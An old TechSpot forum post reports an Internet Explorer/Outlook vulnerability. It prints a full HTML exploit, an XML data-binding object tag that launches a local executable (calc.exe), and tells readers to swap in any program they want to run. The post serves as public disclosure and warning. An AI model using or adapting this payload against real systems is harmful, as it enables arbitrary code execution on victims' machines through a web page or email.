Welcome to the TechSpot OpenBoards. Please read the FAQ if you have any questions. Login to participate.
Another IE/Outlook Hole
|
|||||||
 |
|
Thread Tools |
|
#1
03-06-2002
|
||||
|
||||
|
Another IE/Outlook Hole
The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.
Read the rest here: http://www.theregister.co.uk/content/4/24274.html The article also has a simple fix for this problem. Here's the simple script: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object> ]]> </exploit> </security> </xml> Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary. 
|
|
| Thread Tools | |
|
| Similar Topics | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Black Hole! | AvadaKedavra36 | Device Drivers | 3 | 09-01-2006 08:27 PM |
| Windows XP SP2 has serious security hole | Phantasm66 | Old Frontpage News & Comments | 17 | 09-07-2004 12:02 PM |
| AIM Beta fixes security hole | Phantasm66 | Old Frontpage News & Comments | 5 | 08-13-2004 01:16 AM |
| New Explorer hole could be devastating | Julio | Old Frontpage News & Comments | 7 | 01-29-2004 09:30 AM |
| ZoneLabs Won't Fix Hole In Free Firewall | Julio | Old Frontpage News & Comments | 1 | 07-03-2003 05:42 PM |
All times are GMT -4. The time now is 06:19 AM.
